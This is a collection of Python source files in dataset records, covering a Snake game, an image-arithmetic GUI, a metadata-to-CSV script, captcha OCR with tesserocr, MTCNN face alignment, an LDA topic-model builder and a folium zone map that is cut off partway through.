+{"seq_id":"610382567","text":"# imports\nimport pygame\nimport sys\nimport random\nimport math\n\n# window size\nWIDTH = 600\nHEIGHT = 600\n\n# declaring global variables\nx_pos = 120\ny_pos = 280\nlength = 3\nrunning = True\ntail = []\ndirection = 'RIGHT'\nfoodSize = 20\nsnakeBlockSize = 35\ngridBlock = 40\nscore = 0\nfoodPos = (200, 200)\nfoodOnMap = False\n\n\n# creates list of possible positions of food\n# consists of values of products in \"40 gangern\"\npossiblePos = [x for x in range(0, WIDTH-gridBlock) if x % gridBlock == 0]\n\n# Frames per second\nFPS = 8\n\n# initialize pygame\npygame.init()\ncanvas = pygame.display.set_mode((WIDTH, HEIGHT))\npygame.display.set_caption('SNAKE')\n\n# initialize text\npygame.font.init()\nfontBig = pygame.font.SysFont('Comic Sans MS', 80)\nfontSmall = pygame.font.SysFont('Comic Sans MS', 50)\n\n# creates a clock\nclock = pygame.time.Clock()\n\n# create grid (for demonstrational purposes)\n\"\"\" for i in range(0, WIDTH, 40):\n for m in range(0,WIDTH, 40):\n pygame.draw.rect(canvas, (255,255,255), (i,m,snakeBlockSize,snakeBlockSize),1) \"\"\"\n\n\n# function to initialize snake\ndef initializeSnake(x, y):\n print('initializing')\n for i in range(0, length):\n tail.append({'x': x-i*40, 'y': y})\n pygame.draw.rect(canvas, (255, 255, 255),\n (tail[i]['x'], tail[i]['y'], snakeBlockSize, snakeBlockSize))\n\n\n# initialize snake at start position\ninitializeSnake(x_pos, y_pos)\n\n\n# function to create food\ndef createFood():\n global foodOnMap\n global foodPos\n global possiblePos\n\n # update scoretext\n scoreTxt = fontBig.render(str(score), False, (255, 255, 255))\n canvas.blit(scoreTxt, (10, 10))\n\n # if no food on screen, make new food\n if not foodOnMap:\n # create foodposition in center of each grid block 40x40\n foodPos = (random.choice(possiblePos)+(snakeBlockSize - foodSize)/2,\n random.choice(possiblePos)+(snakeBlockSize-foodSize)/2)\n foodOnMap = True\n pygame.draw.rect(canvas, (255, 0, 0),\n (foodPos[0], foodPos[1], foodSize, foodSize))\n\n\n# function to be called if snake eats food\ndef eatFood():\n global score\n global length\n global foodOnMap\n\n # updates variables\n foodOnMap = False\n score += 1\n length += 1\n\n # add block to snake\n tail.append({'x': tail[-1]['x'], 'y': 
tail[-1]['y']})\n\n\n# create snake\ndef drawSnake(dir):\n global x_pos\n global y_pos\n global gridBlock\n\n # draw background color to blank the screen\n canvas.fill((0, 0, 0))\n\n # create new food\n createFood()\n\n # check current direction and update snake position\n if (dir == 'LEFT'):\n x_pos -= gridBlock\n tail.insert(0, {'x': x_pos, 'y': y_pos})\n tail.pop()\n elif (dir == 'RIGHT'):\n x_pos += gridBlock\n tail.insert(0, {'x': x_pos, 'y': y_pos})\n tail.pop()\n elif (dir == 'UP'):\n y_pos -= gridBlock\n tail.insert(0, {'x': x_pos, 'y': y_pos})\n tail.pop()\n elif (dir == 'DOWN'):\n y_pos += gridBlock\n tail.insert(0, {'x': x_pos, 'y': y_pos})\n tail.pop()\n\n # draw updated snake\n for i in range(0, length):\n pygame.draw.rect(canvas, (255, 255, 255),\n (tail[i]['x'], tail[i]['y'], snakeBlockSize, snakeBlockSize))\n\n # skip first block of the snake\n if i == 0:\n continue\n\n # check if snake collides with tail\n if (collide(tail[0]['x'], tail[i]['x'], tail[0]['y'], tail[i]['y'], snakeBlockSize, snakeBlockSize, snakeBlockSize, snakeBlockSize)):\n quitGame()\n\n # check if snake collides with food\n if (collide(tail[0]['x'], foodPos[0], tail[0]['y'], foodPos[1], snakeBlockSize, foodSize, snakeBlockSize, foodSize)):\n eatFood()\n\n # check if snake collides with walls\n if (tail[0]['x'] > WIDTH-snakeBlockSize or tail[0]['x'] < 0 or tail[0]['y'] > HEIGHT-snakeBlockSize or tail[0]['y'] < 0):\n quitGame()\n\n\n# function to quit and pause game\ndef quitGame():\n global running\n\n # display game over text\n quitText = fontBig.render('Game over', False, (255, 0, 0))\n scoreTxt = fontSmall.render('Score: ' + str(score), False, (255, 0, 0))\n infoTxt = fontSmall.render('Press enter to retry',False, (255,255,255))\n canvas.blit(quitText, (WIDTH/2 - quitText.get_rect().width/2, HEIGHT/2-60))\n canvas.blit(scoreTxt, (WIDTH/2 - scoreTxt.get_rect().width/2, HEIGHT/2+20))\n canvas.blit(infoTxt, (WIDTH/2 - infoTxt.get_rect().width/2, HEIGHT/2+80))\n\n running = False\n\n\n# function to check if two objects collide\n# returns boolean\ndef collide(x1, x2, y1, y2, w1, w2, h1, h2):\n if (x1+w1 > x2 and x1 < x2+w2 and y1+h1 > y2 and y1 < y2+h2):\n return True\n else:\n return False\n\n\n# function to reset game\ndef resetGame():\n global running\n global tail\n global score\n global length\n global x_pos\n global y_pos\n global direction\n global foodOnMap\n\n # draw background color to blank the screen\n canvas.fill((0, 0, 0))\n\n # reset variables for new game\n tail = []\n foodOnMap = False\n length = 3\n score = 0\n x_pos = 120\n y_pos = 280\n direction = 'RIGHT'\n\n # initialize snake at start position\n initializeSnake(x_pos, y_pos)\n\n running = True\n\n\n# function to pause game\ndef pauseGame():\n global running\n running = False\n \n # display pause text\n pauseTxt = fontBig.render('PAUSED', False, (255, 255, 255))\n canvas.blit(pauseTxt, (WIDTH/2 - pauseTxt.get_rect().width/2, HEIGHT/2))\n\n\n# function to resume game\ndef resumeGame():\n global running\n running = True\n\n\n# game loop\nwhile True:\n # if game is running\n if running:\n clock.tick(FPS)\n # draw new snake for every fps\n drawSnake(direction)\n\n # listen for key events\n for e in pygame.event.get():\n if e.type == pygame.KEYDOWN:\n if (e.key == pygame.K_LEFT and direction != 'RIGHT'):\n direction = 'LEFT'\n elif (e.key == pygame.K_RIGHT and direction != 'LEFT'):\n direction = 'RIGHT'\n elif (e.key == pygame.K_UP and direction != 'DOWN'):\n direction = 'UP'\n elif (e.key == pygame.K_DOWN and direction != 'UP'):\n direction 
= 'DOWN'\n elif (e.key == pygame.K_p):\n pauseGame()\n\n if e.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n\n # game is not running, freeze game\n else:\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN:\n if (event.key == pygame.K_RETURN):\n resetGame()\n elif (event.key == pygame.K_p):\n resumeGame()\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n\n pygame.display.flip()\n","sub_path":"Game/Snake/snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":6857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"178474460","text":"import tkinter as tk\nfrom tkinter import Canvas, filedialog as fd\nfrom tkinter.constants import NONE\nfrom PIL import Image,ImageTk\nimport cv2 as cv\nimport numpy as np\n# library imports\n\nwin=tk.Tk()\nwin.title('实验二')\nwin.geometry('1024x1024')\n# create the main window\nclass PictureProcessor(): \n def selectPicture(self):\n pic_name = fd.askopenfilename(title='选择图片', filetypes=[('jpg','png'), ('All Files', '*')])\n return pic_name\n def add_together(self,r_a,r_b):\n image_add=np.add(r_a,r_b) \n cv.imwrite('add.png',image_add)\n path_add='add.png'\n return path_add\n def subtract_together(self,r_a,r_b):\n image_subtract=np.subtract(r_a,r_b)\n cv.imwrite('subtract.png',image_subtract) \n path_subtract='subtract.png'\n return path_subtract \n def multiply_together(self,r_a,r_b):\n image_multiply=np.multiply(r_a,r_b)\n cv.imwrite('multiply.png',image_multiply)\n path_multiply='multiply.png'\n return path_multiply\n def divide_together(self,r_a,r_b):\n image_divide=np.divide(r_a,r_b)\n cv.imwrite('divide.png',image_divide)\n path_divide='divide.png'\n return path_divide \n # image processing operations\nclass PictureProcessorPro(PictureProcessor):\n def update_resized_image(self,image,canvas_width,canvas_height):\n scale = min([1.0 * canvas_width / image.width, 1.0 * canvas_height / image.height])\n image_width = int(image.width * scale)\n image_height = int(image.height * scale)\n scaled = image.resize((image_width, image_height), Image.ANTIALIAS)\n return scaled\n # scale proportionally to fit the canvas size\n def pic_select_a(self): \n global path_a \n # declare the global up front so the image can be accessed from other methods\n path_a=self.selectPicture()\n image_a=Image.open(path_a)\n image = ImageTk.PhotoImage(image=self.update_resized_image(image_a,200,200))\n l_a.image = image\n l_a.create_image(100, 100, image=image, anchor=tk.CENTER)\n # select image a and display it\n def pic_select_b(self): \n global path_b\n path_b=self.selectPicture() \n image_b=Image.open(path_b)\n image = ImageTk.PhotoImage(image=self.update_resized_image(image_b,200,200))\n l_b.image = image\n l_b.create_image(100, 100, image=image, anchor=tk.CENTER)\n # select image b and display it\n def pic_add(self):\n r_a=cv.imread(path_a)\n r_b=cv.imread(path_b)\n image_add=Image.open(self.add_together(r_a,r_b))\n image = ImageTk.PhotoImage(image=self.update_resized_image(image_add,200,200))\n l_add.image = image\n l_add.create_image(100, 100, image=image, anchor=tk.CENTER)\n # add the two images and display the result\n def pic_subtract(self):\n r_a=cv.imread(path_a)\n r_b=cv.imread(path_b)\n image_subtract=Image.open(self.subtract_together(r_a,r_b))\n image = ImageTk.PhotoImage(image=self.update_resized_image(image_subtract,200,200))\n l_subtract.image = image\n l_subtract.create_image(100, 100, image=image, anchor=tk.CENTER)\n # subtract the two images and display the result\n def pic_multiply(self):\n r_a=cv.imread(path_a)\n r_b=cv.imread(path_b)\n image_multiply=Image.open(self.multiply_together(r_a,r_b))\n image = ImageTk.PhotoImage(image=self.update_resized_image(image_multiply,200,200))\n l_multiply.image = image\n l_multiply.create_image(100, 
100, image=image, anchor=tk.CENTER)\n # multiply the two images and display the result\n def pic_divide(self):\n r_a=cv.imread(path_a)\n r_b=cv.imread(path_b)\n image_divide=Image.open(self.divide_together(r_a,r_b))\n image = ImageTk.PhotoImage(image=self.update_resized_image(image_divide,200,200))\n l_divide.image = image\n l_divide.create_image(100, 100, image=image, anchor=tk.CENTER)\n # divide the two images and display the result\nclass Frame():\n def frame(self):\n global l_a,l_b,l_add,l_subtract,l_multiply,l_divide\n canvas_width=200\n canvas_height=200\n\n l_a=Canvas(win,width=canvas_width,height=canvas_height,bg='white')\n l_a.grid(row=2,column=1,padx=20, pady=20)\n\n l_b=Canvas(win,width=canvas_width,height=canvas_height,bg='white')\n l_b.grid(row=2,column=2,padx=20, pady=20)\n\n l_add=Canvas(win,width=canvas_width,height=canvas_height,bg='white')\n l_add.grid(row=4,column=1,padx=20, pady=20)\n\n l_subtract=Canvas(win,width=canvas_width,height=canvas_height,bg='white')\n l_subtract.grid(row=4,column=2,padx=20, pady=20)\n\n l_multiply=Canvas(win,width=canvas_width,height=canvas_height,bg='white')\n l_multiply.grid(row=4,column=3,padx=20, pady=20)\n\n l_divide=Canvas(win,width=canvas_width,height=canvas_height,bg='white')\n l_divide.grid(row=4,column=4,padx=20, pady=20)\n # layout of the image canvases\n picture=PictureProcessorPro()\n botton1=tk.Button(win,text='选择图片a',width=10,height=2,command=picture.pic_select_a)\n botton1.grid(row=1,column=1)\n\n botton2=tk.Button(win,text='选择图片b',width=10,height=2,command=picture.pic_select_b)\n botton2.grid(row=1,column=2)\n\n botton3=tk.Button(win,text='图片相加',width=10,height=2,command=picture.pic_add)\n botton3.grid(row=3,column=1)\n\n botton4=tk.Button(win,text='图片相减',width=10,height=2,command=picture.pic_subtract)\n botton4.grid(row=3,column=2)\n\n botton5=tk.Button(win,text='图片相乘',width=10,height=2,command=picture.pic_multiply)\n botton5.grid(row=3,column=3)\n\n botton6=tk.Button(win,text='图片相除',width=10,height=2,command=picture.pic_divide)\n botton6.grid(row=3,column=4)\n # layout of the buttons\n\ndef main():\n frame1=Frame()\n frame1.frame()\n # call the frame method to build the layout \n win.mainloop()\nif __name__ == '__main__':\n main()","sub_path":"图片四则运算/arithmetic.py","file_name":"arithmetic.py","file_ext":"py","file_size_in_byte":5902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"525633624","text":"#%%\n# IMPORTS\nimport pandas as pd\nimport sys\nfrom pathlib import Path\n\nfrom asset_scraping.un_scraper.un_scraper.scrapy_results.base_json import base_json\n\n\n#%%\n# LOGGING\nimport logging\nlogger = logging.getLogger()\nlogger.handlers = []\n\n# Set Level\nlogger.setLevel(logging.DEBUG)\n\n# Create Formatter\nFORMAT = \"%(asctime)s %(levelno)s - %(module)-15s - %(funcName)-15s - %(message)s\"\nDATE_FMT = \"%Y-%m-%d %H:%M:%S\"\nformatter = logging.Formatter(FORMAT, DATE_FMT)\n\n# Create Handler and Assign\nhandler = logging.StreamHandler(sys.stderr)\nhandler.setFormatter(formatter)\nlogger.handlers = [handler]\nlogger.critical(\"Logging started\")\n\n#%%\n# Create a local directory in which you will store the final CSV\n# Assert it exists\nPATH_BASE = Path(\"~/desktop/wb_data\").expanduser()\nassert PATH_BASE.exists()\n\n#%%\n# import asset list & asset sizes list from get_asset_lengths\nfrom asset_scraping.un_scraper.un_scraper.get_asset_lengths import url_lists\nfrom asset_scraping.un_scraper.un_scraper.get_asset_lengths import all_asset_sizes_list\n\n#%%\n\nfor i in url_lists:\n print(len(i))\n\nfor j in all_asset_sizes_list:\n print(len(j))\n\n\n#%%\n# ADD INDIVIDUAL FILE URLS TO DICTIONARY\n# Make sure 
base_json is imported\n\ndef create_dict_add_urls():\n\n b = 0\n while b < len(base_json):\n for dictionary1 in base_json:\n print(dictionary1)\n\n # try:\n # del dictionary1['file[2]url']\n # except KeyError:\n # continue\n a = 0\n while a < len(url_lists[b]):\n\n dictionary1[\"files\" + \"[\" + str(a) + \"]:\" + \"url\"] = url_lists[b][a]\n logging.info(\"add {} to dictionary\".format(url_lists[b][a]))\n\n dictionary1[\"files\" + \"[\" + str(a) + \"]:\" + \"contentLength\"] = all_asset_sizes_list[b][a]\n logging.info(\"add {} to dictionary\".format(all_asset_sizes_list[b][a]))\n\n dictionary1[\"files\" + \"[\" + str(a) + \"]:\" + \"checksum\"] = 0\n\n dictionary1[\"files\" + \"[\" + str(a) + \"]:\" + \"checksumType\"] = \"\"\n\n dictionary1[\"files\" + \"[\" + str(a) + \"]:\" + \"compression\"] = \"\"\n\n dictionary1[\"files\" + \"[\" + str(a) + \"]:\" + \"resourceId\"] = a\n\n dictionary1[\"files\" + \"[\" + str(a) + \"]:\" + \"index\"] = a\n\n a += 1\n\n b += 1\n\n\ncreate_dict_add_urls()\n\n#%%\n# SEE WHAT BASE JSON looks like\n\nprint(base_json)\n#%%\n# Delete file[2]url (old list of urls in dictionaries)\n\nfor dict1 in base_json:\n del dict1['file[2]url']\n\n\n#%%\n# Make Dictionary for Pandas\npandas_dict = {}\n\n\ndef create_dict():\n b = 0\n while b < len(base_json):\n\n short_term_dict = base_json[b]\n\n pandas_dict[base_json[b][\"name\"]] = short_term_dict\n\n b += 1\n\n logging.info(\"added {} datasets to dict\".format(len(pandas_dict)))\n print(pandas_dict)\n\n\ncreate_dict()\n\n#%%\n# STORE LOCALLY\n\n\ndef create_pd_store_locally():\n meta_pd = pd.DataFrame.from_dict(data=pandas_dict, orient='columns')\n print(meta_pd)\n\n file_name = 'un_data_test.csv'\n meta_pd.to_csv(PATH_BASE / file_name)\n logging.info(\"stored {} in {} directory\".format(file_name, PATH_BASE))\n\n\ncreate_pd_store_locally()\n","sub_path":"asset_scraping/un_scraper/un_scraper/create_csv.py","file_name":"create_csv.py","file_ext":"py","file_size_in_byte":3182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"215954717","text":"#! 
/usr/bin/env python3\n# -*- coding:utf-8 -*-\n\nimport tesserocr\nfrom PIL import Image\n\nimage = Image.open('捷顺停车/code.jpg')\nimage = image.convert('L')\nthreshold = 60\ntable = []\nfor i in range(256):\n\tif i < threshold:\n\t\ttable.append(0)\n\telse:\n\t\ttable.append(1)\nimage = image.point(table, '1')\n# image.show()\nresult = tesserocr.image_to_text(image)\nprint(result)\nprint(tesserocr.tesseract_version())\nprint(tesserocr.get_languages())","sub_path":"验证码识别.py","file_name":"验证码识别.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"137771105","text":"import tensorflow as tf\nimport numpy as np\nimport cv2\nfrom detection.mtcnn import detect_face\nimport matplotlib.pyplot as plt\n\n\ndefault_color = (0, 255, 0) #BGR\ndefault_thickness = 2\n\n\n\n\n\ndef calculate_degree(pt1,pt2):\n \"\"\"Calculates the angle that corresponds to the slope of the line connecting pt1 to pt2.\n \n Args:\n pt1 ((x,y) or [x,y]): Coordinate of the first point.\n pt2 ((x,y) or [x,y]): Coordinate of the second point.\n \n Returns:\n float: angle\n \"\"\"\n \n pt1,pt2 = np.array(pt1), np.array(pt2)\n pt1, pt2 = pt1[:], pt2[:]\n dx = (pt1[0] - pt2[0])\n dy = (pt1[1] - pt2[1])\n angle = np.degrees(np.arctan2(dy, dx)) - 180\n return angle\n\n\ndef display_point(img, point):\n \"\"\"Displays a point on an image without changing the original image.\n \n Args:\n img (nd-array): Image as a numpy array.\n point ((x,y) or [x,y]): Coordinate of the point.\n \n Returns:\n nd-array: Mutated image with the point on it.\n \"\"\"\n img = img.copy()\n point = (point[0], point[1])\n cv2.circle(img, center=point, radius=1, color=default_color, thickness=default_thickness)\n plt.imshow(img)\n plt.show()\n return img\ndef display_box(img, box):\n \"\"\"Displays a rectangle on an image without changing the original image.\n \n Args:\n img (nd-array): Image as a numpy array.\n box (nd-array): Array of shape 2*2 [[x1,y1], [x2,y2]], where [x1,y1] is the lower-left corner \n of the rectangle and [x2,y2] the upper-right one.\n \n Returns:\n nd-array: Mutated image with the box shown.\n \"\"\"\n box = box.astype('int32')\n #box should have (x,y) coords stacked vertically\n img = img.copy()\n cv2.rectangle(img, (box[0,0], box[0,1]), (box[1,0], box[1,1]), color=default_color, thickness=default_thickness)\n plt.imshow(img)\n plt.show()\n return img\n\ndef scale_box(box, scale):\n \"\"\"Scales a rectangle by a ratio.\n \n Args:\n box (nd-array): Array of shape 2*2 [[x1,y1], [x2,y2]], where [x1,y1] is the lower-left corner \n of the rectangle and [x2,y2] the upper-right one.\n scale (float): Ratio to which the box is scaled.\n \n Returns:\n (nd-array): 2*2 Array with the same properties as box argument.\n \"\"\"\n #upper left and lower-right as (x,y) stacked vertically\n center = np.mean(box,axis=0).astype('int32')\n h = abs(box[0,1] - box[1,1]) * scale\n w = abs(box[0,0] - box[1,0]) * scale\n return np.array([[center[0]-w//2, center[1] - h//2], [center[0] + w//2, center[1] + h//2]]).astype('int32')\n \ndef safe_crop(img, box):\n \"\"\"Crops an image to a rectangular area, handling out-of-bounds coordinates.\n \n Args:\n img (nd-array): Image as a numpy array. 
\n box (nd-array): Array of shape 2*2 [[x1,y1], [x2,y2]], where [x1,y1] is the lower-left corner \n of the rectangle and [x2,y2] the upper-right one.\n Returns:\n (nd-array): Cropped image.\n \"\"\"\n h, w = img.shape[0], img.shape[1]\n \n # box is invalid:\n if box[0,0] > box[1,0] or box[0,1] > box[1,1]:\n return None\n # coords are beyond image boundaries:\n box[0,0] = 0 if box[0,0] < 0 else box[0,0]\n box[0,0] = w if box[0,0] > w else box[0,0]\n box[1,0] = 0 if box[1,0] < 0 else box[1,0]\n box[1,0] = w if box[1,0] > w else box[1,0]\n box[0,1] = 0 if box[0,1] < 0 else box[0,1]\n box[0,1] = h if box[0,1] > h else box[0,1]\n box[1,1] = 0 if box[1,1] < 0 else box[1,1]\n box[1,1] = h if box[1,1] > h else box[1,1]\n return img[box[0,1]:box[1,1], box[0,0]:box[1,0]]\n\ndef apply_affine(points, transformation):\n \"\"\"Applies an affine transformation (like the output of cv2.getRotationMatrix2D) on a vector or matrix.\n \n Args:\n points (nd-array): Array of form [[x1,y1], [x2,y2], ...] stacked vertically.\n transformation (nd-array): A 2*3 affine transformation matrix.\n \n Returns:\n (nd-array): Points under the influence of the transformation, with the same format as input.\n \"\"\"\n return ((np.dot(transformation[:,:2], points.reshape(-1, 2).T) + transformation[:,2].reshape(2,1)).T).astype('int32')\n\ndef scale_points(points,img_source, img_dest):\n \"\"\"Scales points of source image to correspond to their position in destination.\n \n Args:\n points (nd-array): Array of form [[x1,y1], [x2,y2], ...] stacked vertically.\n img_source (nd-array): Image to which points belong.\n img_dest (nd-array): Destination image.\n \n Returns:\n (nd-array): corresponding positions of points in form [[x1,y1], [x2,y2], ...] stacked vertically.\n \"\"\"\n \n h_scale = img_dest.shape[0] / img_source.shape[0]\n w_scale = img_dest.shape[1] / img_source.shape[1]\n return (points * np.array([w_scale, h_scale]).reshape(1,2)).astype('int32')\n\n\n\nclass FaceExtractor:\n def __init__(self, minsize=20, threshold=[ 0.7, 0.7, 0.9], factor=0.71):\n with tf.Graph().as_default():\n self.sess = tf.Session()\n self.pnet, self.rnet, self.onet = detect_face.create_mtcnn(self.sess, None)\n self.mtcnn_img_size = (250,250)\n self.minsize = minsize # minimum size of face\n self.threshold = threshold # three steps' thresholds\n self.factor = factor # scale factor\n def extract_faces(self, img):\n \"\"\"Detects faces in an image, and aligns them based on their eyes position.\n \n Args:\n img (nd-array): numpy array representing an image.\n \n Returns:\n (list): A list containing nd-arrays each representing an aligned face.\n \n \"\"\"\n original_image = img.copy()\n height, width = original_image.shape[:2] # image shape has 3 dimensions\n \n # mtcnn requires images to be at the size of about 250*250\n resized_img = cv2.resize(img, self.mtcnn_img_size)\n \n # mtcnn returns 5 points for each face it detects in an array of 10 [x1,...,x5,y1,...,y5].T form\n # note that the points array is vertical\n # bounding_boxes is in the form of [x1,y1,x2,y2,conf] for each face stacked vertically in an nd-array\n bounding_boxes, points = detect_face.detect_face(resized_img, self.minsize, self.pnet, \\\n self.rnet, self.onet, self.threshold, self.factor)\n \n # we transform all the points to be in [x,y] format\n # list of five points for each face (the first two points are eyes)\n faces_xy = [face.reshape(2,5).T for face in points.T]\n \n # list of 2*2 arrays of form nd-array[[x1,y1], [x2,y2]] with points specifying corners 
of rectangle\n faces_boxes = [box[:4].reshape(2,2) for box in bounding_boxes.astype('int32')]\n \n \n \n # angle of the slope of the line connecting two eyes for each face\n angle = [calculate_degree(face_points[0], face_points[1]) for face_points in faces_xy]\n \n \n # iterating through the faces aligning, rescaling and cropping\n cropped_faces = []\n for i in range(len(faces_boxes)):\n \n original_face_points = scale_points(faces_xy[i], resized_img, original_image)\n # getting rotation matrix around eyes_center without scaling\n# rotation_mat = cv2.getRotationMatrix2D(eyes_centers[i], angle[i], 1.0)\n \n # the box coordinates in the original image\n original_box = scale_points(faces_boxes[i], resized_img, original_image)\n # center of the eyes for this face\n eyes_center = (int(sum(original_face_points[:2,0])/2) , int(sum(original_face_points[:2,1])/2))\n original_rotation_mat = cv2.getRotationMatrix2D(eyes_center, angle[i], 1.0)\n \n \n\n\n # refer to affine transformation matrix definition \n rotated_original_image = cv2.warpAffine(original_image, original_rotation_mat, (width,height))\n # scale the bounding box to include areas around the face\n scaled_box = scale_box(original_box, 1.2)\n nose_position_rotated = apply_affine(original_face_points[2,:], original_rotation_mat)[0]\n \n # Center the cropping box around nose in the rotated original image\n box_width = abs(scaled_box[0,0] - scaled_box[1,0])\n box_height = abs(scaled_box[0,1] - scaled_box[1,1])\n box_nose_centered = np.array([[nose_position_rotated[0]-box_width//2, nose_position_rotated[1]-box_height//2], \\\n [nose_position_rotated[0]+box_width//2, nose_position_rotated[1]+box_height//2]])\n cropped_faces.append(safe_crop(rotated_original_image, scaled_box))\n \n return cropped_faces\n\n\n","sub_path":"DataCollection/mtcnn-face-extraction/extractor.py","file_name":"extractor.py","file_ext":"py","file_size_in_byte":8968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"208707589","text":"from random import choice\r\n\r\nquestions = [\"Why do we need to brush our teeth:\",\"Where does our poop go:\", \"Why is running faster than walking:\"]\r\n\r\n\r\nquestion = choice(questions)\r\nanswer = input(question).strip().lower()\r\n\r\nwhile answer != \"just because\":\r\n\tanswer = input(\"why?: \").strip().lower()\r\n\r\nprint(\"Oh...Okay\")","sub_path":"baby.py","file_name":"baby.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"268498341","text":"import pickle\n\nimport gensim.downloader as api\nimport spacy\nfrom django.core.management.base import BaseCommand, CommandError\nfrom gensim import corpora\nfrom gensim.models import LdaModel, LdaMulticore\nfrom spacy.tokens import Doc\nimport re\nfrom loguru import logger\nimport pandas as pd\nfrom sklearn.datasets import fetch_20newsgroups\n\n\nclass Command(BaseCommand):\n help = \"Build Model\"\n\n def _preprocess_doc(self, doc) -> list:\n \"\"\"tokenization function.\n\n Arguments:\n doc {?} -- A piece of doc\n\n Returns:\n [list] -- A list of tokens\n \"\"\"\n output = []\n for token in doc:\n\n # if (\n # token.is_stop\n # or token.is_punct\n # or token.like_email\n # or token.is_digit\n # or token.like_url\n # or token.is_space\n # or re.search(\"\\n\", token.text)\n # ):\n if token.is_alpha and not token.is_stop and len(token.text) >= 3:\n output.append(token.lemma_.lower())\n return output\n\n def 
handle(self, *args, **kwargs):\n newsgroups_train = fetch_20newsgroups(subset='train')\n dataset = newsgroups_train.data\n nlp = spacy.load(\"en_core_web_sm\")\n nlp.add_pipe(self._preprocess_doc, name = \"preprocess\")\n print(\"Preprocessing dataset...\")\n data_processed = list(map(nlp, dataset))\n\n with open(\"./data.pkl\", \"wb\") as f:\n pickle.dump(data_processed, f)\n\n print(\"Building dictionary...\")\n dct = corpora.Dictionary(data_processed)\n corpus = [dct.doc2bow(line) for line in data_processed]\n print(\"Building LDA Model...\")\n lda_model = LdaMulticore(\n corpus=corpus,\n id2word=dct,\n random_state=100,\n num_topics=6,\n passes=10,\n chunksize=1000,\n batch=False,\n alpha=\"asymmetric\",\n decay=0.5,\n offset=64,\n eta=None,\n eval_every=0,\n iterations=100,\n gamma_threshold=0.001,\n per_word_topics=True,\n )\n with open(\"./model.pkl\", \"wb\") as f:\n pickle.dump(lda_model, f)\n self.stdout.write(self.style.SUCCESS(\"Model Built\"))\n\n","sub_path":"neo/management/commands/build_model.py","file_name":"build_model.py","file_ext":"py","file_size_in_byte":2340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"}
+{"seq_id":"248549499","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 9 11:45:40 2019\n\n@author: reeves\n\"\"\"\n\nimport getpass\nimport pandas as pd\nimport geopandas as gpd\nimport json\nfrom shapely.geometry import Point, shape\nimport folium as fm\nfrom branca.element import Template, MacroElement\n\n#%%\nchosen = False\nwhile chosen == False:\n service_type = input('''\n Please choose service type\n 1 : groceries\n 2 : food\n ''')\n \n if service_type == '1':\n df = pd.read_excel(r'file:///C:/Users/reeves/Desktop/operational/apartment_mapping/grocery_ff.xlsx')\n chosen = True\n \n elif service_type == '2':\n df = pd.read_excel(r'file:///C:/Users/reeves/Desktop/operational/apartment_mapping/food_ff.xlsx')\n chosen = True\n else:\n print('Incorrect input. 
Please try again.')\n \n\nzones = pd.read_csv(r'file:///C:/Users/reeves/Desktop/operational/zone_poly/zone_polygons.csv')\napartments = pd.read_csv(r'file:///C:/Users/reeves/Desktop/operational/apartment_mapping/apartment_coords.csv')\nstores = pd.read_csv('file:///C:/Users/reeves/Desktop/operational/apartment_mapping/priority_store_list.csv')\n\ndf.rename(columns={'Shipping Address Address Location' : 'drop_loc',\n 'Fulfillments Net Fulfillments' : 'net_ff'},\n inplace=True)\n\napartments.rename(columns={'Shipping Address Address Location': 'loc'},\n inplace=True)\n\nzones.rename(columns={'Zones Zone ID' : 'zone_id',\n 'Zones Zone Name' : 'zone_name',\n 'Zones Zone Area' : 'zone_polygon'},\n inplace=True)\n\nzones.dropna(inplace=True)\nzones.reset_index(drop=True, inplace=True)\n\n#%%\nr_zone_poly_list = []\nzone_poly_list = []\nprint('Creating shapely Shapes...')\nfor i in range(len(zones.zone_polygon)):\n polygon = json.loads(zones.zone_polygon[i])\n zone_poly_list.append(shape(polygon))\n \n for j in range(len(polygon['coordinates'][0])):\n long = polygon['coordinates'][0][j][0]\n lat = polygon['coordinates'][0][j][1]\n polygon['coordinates'][0][j][0] = lat\n polygon['coordinates'][0][j][1] = long\n \n r_zone_poly_list.append(shape(polygon))\n print(i)\n\nzones = zones.assign(r_zone_polygon=r_zone_poly_list,\n zone_polygon=zone_poly_list)\n\n#%%\n\ndrop_zone_id_list = []\nprint('Appending Zone IDs..')\nfor i in range(len(df.drop_loc)):\n p1, p2 = df.drop_loc[i].split(',')[0], df.drop_loc[i].split(',')[1]\n p1 = float(p1)\n p2 = float(p2)\n point = Point(p1, p2)\n check = False\n \n for j in range(len(zones.r_zone_polygon)):\n if zones.r_zone_polygon[j].contains(point) == True:\n drop_zone_id_list.append(zones.zone_id[j])\n print(i, point, zones.zone_id[j])\n check = True\n \n if check == False:\n drop_zone_id_list.append(None)\n print(i, point)\n \n \ndf = df.assign(zone_id = drop_zone_id_list)\n#%%\nprint('Left Join!')\n\ndf.drop(columns=['drop_loc',\n 'drop_zone',\n 'Fulfillments Operation Local Delivery Timeslot Starts Week of Year',\n 'Fulfillments Service Type'],\n inplace=True)\ndf.reset_index(drop=True, inplace=True)\n\ndf = df.groupby(['zone_id'], as_index=False).net_ff.sum()\nzones = zones.merge(df, how='left', on='zone_id')\n\nzones.drop(columns=['r_zone_polygon'], inplace=True)\nzones.fillna(0, inplace=True)\ngdf = gpd.GeoDataFrame(zones, geometry='zone_polygon')\n#%%\nprint('Creating Map') \ndist_map = fm.Map(location=[35.6762, 139.6503],\n zoom_start=10,\n tiles='StamenToner')\n\nfm.GeoJson(data=gdf.to_json(),\n style_function= lambda x :{'fillColor':'#FF2A1C' if \\\n x['properties']['net_ff']>=250 \\\n else '#FFC133' if 